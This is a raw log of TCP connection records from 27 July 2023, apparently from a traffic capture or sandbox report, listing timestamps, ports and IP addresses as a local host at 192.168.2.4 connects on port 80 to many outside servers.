                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.835958958 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.835988998 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.836009979 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.836030960 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.836046934 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.836066008 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.836339951 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.870867968 CEST8049700192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.870903969 CEST8049700192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.871036053 CEST4970080192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.914123058 CEST4970280192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.934084892 CEST804970280.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.934206009 CEST4970280192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.971765041 CEST4969580192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.975944996 CEST8049701206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.976078033 CEST4970180192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.995095015 CEST4970080192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.019619942 CEST4970380192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.033056974 CEST4970180192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.096472979 CEST8049700192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.096656084 CEST4970080192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.110920906 CEST804969534.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.147056103 CEST4970480192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.147861958 CEST4970580192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.164196014 CEST8049705104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.164323092 CEST4970580192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.166424990 CEST80497043.64.163.50192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.166524887 CEST4970480192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.167674065 CEST80497033.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.167782068 CEST4970380192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.197787046 CEST4970580192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.197871923 CEST4970480192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.198004961 CEST4970380192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.199472904 CEST4970680192.168.2.4170.82.173.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.214212894 CEST8049705104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.216711998 CEST80497043.64.163.50192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.216916084 CEST80497043.64.163.50192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.216986895 CEST4970480192.168.2.43.64.163.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.280154943 CEST4970780192.168.2.489.161.163.246
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.287585974 CEST8049705104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.287640095 CEST8049705104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.287672997 CEST8049705104.21.88.198192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.287681103 CEST4970580192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.287756920 CEST4970580192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.287756920 CEST4970580192.168.2.4104.21.88.198
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.293226004 CEST8049701206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.293709993 CEST8049701206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.293751001 CEST8049701206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.293793917 CEST4970180192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.293853045 CEST4970180192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.309968948 CEST4970180192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.310678959 CEST804970789.161.163.246192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.310782909 CEST4970780192.168.2.489.161.163.246
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.332169056 CEST8049706170.82.173.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.332302094 CEST4970680192.168.2.4170.82.173.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.345081091 CEST80497033.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.345129967 CEST80497033.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.345180035 CEST4970380192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.345180988 CEST4970380192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.360198975 CEST4970380192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.376751900 CEST4970780192.168.2.489.161.163.246
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.377219915 CEST4970680192.168.2.4170.82.173.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.379575968 CEST4970880192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.398045063 CEST4970980192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.407696009 CEST804970789.161.163.246192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.408354998 CEST804970789.161.163.246192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.408392906 CEST804970789.161.163.246192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.408459902 CEST4970780192.168.2.489.161.163.246
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.408459902 CEST4970780192.168.2.489.161.163.246
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.449445963 CEST4971080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.468967915 CEST8049710192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.469137907 CEST4971080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.478501081 CEST4971080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.497282028 CEST8049710192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.497483969 CEST8049710192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.498045921 CEST4971080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.507380009 CEST80497033.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.509692907 CEST8049706170.82.173.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.532299995 CEST4971280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.532305956 CEST4971180192.168.2.4172.67.173.200
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.533332109 CEST4971080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.546547890 CEST80497093.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.546679974 CEST4970980192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.546947956 CEST4970980192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.549175978 CEST8049711172.67.173.200192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.549274921 CEST4971180192.168.2.4172.67.173.200
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.549555063 CEST4971180192.168.2.4172.67.173.200
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.552257061 CEST8049710192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.552350044 CEST4971080192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.566833973 CEST8049711172.67.173.200192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.570133924 CEST8049701206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.570261955 CEST8049712135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.570435047 CEST4971280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.576256037 CEST4971280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.576535940 CEST8049711172.67.173.200192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.576734066 CEST4971180192.168.2.4172.67.173.200
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.615140915 CEST8049712135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.615398884 CEST8049712135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.615469933 CEST4971280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.645426989 CEST4971380192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.653918982 CEST4971280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.664606094 CEST8049708202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.664741039 CEST4970880192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.669909954 CEST4970880192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.691612005 CEST8049712135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.692008972 CEST4971280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.695828915 CEST80497093.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.695851088 CEST80497093.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.695964098 CEST4970980192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.695965052 CEST4970980192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.701009035 CEST8049706170.82.173.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.701090097 CEST4970680192.168.2.4170.82.173.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.713356972 CEST4970980192.168.2.43.19.116.195
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.743768930 CEST8049713192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.743877888 CEST4971380192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.785598040 CEST4971380192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.785981894 CEST4970680192.168.2.4170.82.173.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.787446976 CEST4971480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.787630081 CEST4971580192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.787915945 CEST4971680192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.807018042 CEST8049714188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.807212114 CEST4971480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.810731888 CEST4971480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.830291986 CEST8049714188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.830333948 CEST8049714188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.830471992 CEST4971480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.849841118 CEST4971480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.861367941 CEST80497093.19.116.195192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.869362116 CEST8049714188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.869524002 CEST4971480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.883296013 CEST8049713192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.885107994 CEST8049713192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.885191917 CEST4971380192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.919560909 CEST8049706170.82.173.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.953648090 CEST804971569.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.953730106 CEST4971580192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.954843998 CEST8049708202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.956065893 CEST8049708202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.956273079 CEST4970880192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.966636896 CEST4971780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.984498978 CEST4971580192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.985838890 CEST4971880192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.987525940 CEST4970880192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.992362976 CEST8049706170.82.173.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.992604017 CEST4970680192.168.2.4170.82.173.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.006880045 CEST8049717185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.007401943 CEST4971780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.070028067 CEST4971780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.077687025 CEST804971660.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.077816963 CEST4971680192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.108731985 CEST8049717185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.108938932 CEST8049717185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.109005928 CEST4971780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.134104013 CEST804971818.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.134227037 CEST4971880192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.139974117 CEST4971680192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.140815973 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141084909 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141120911 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141148090 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141171932 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141175985 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141206980 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141220093 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141235113 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141262054 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141268015 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141268015 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141288042 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141308069 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141314983 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141376019 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141376019 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141376019 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141726017 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141753912 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141808033 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.141840935 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142010927 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142039061 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142065048 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142106056 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142138004 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142633915 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142662048 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142687082 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142713070 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142735958 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142740965 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142774105 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.142791033 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143317938 CEST4971880192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143613100 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143651962 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143678904 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143702030 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143728018 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143853903 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.143887997 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144614935 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144649029 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144675016 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144699097 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144721031 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144737005 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144777060 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.144777060 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.150654078 CEST804971569.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.150837898 CEST804971569.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.151043892 CEST4971580192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157479048 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157594919 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157602072 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157617092 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157633066 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157699108 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157737970 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157879114 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157907963 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157921076 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157931089 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.157979012 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158041954 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158057928 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158118963 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158776999 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158797026 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158817053 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158835888 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158854961 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158876896 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158878088 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158934116 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.158955097 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159749031 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159792900 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159817934 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159842968 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159843922 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159869909 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159878016 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159878016 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.159970999 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.160161018 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.160758972 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.160825968 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.160846949 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.160921097 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.160957098 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164601088 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164638996 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164689064 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164702892 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164716959 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164752007 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164805889 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164805889 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164891005 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.164921999 CEST8049697104.26.15.53192.168.2.4
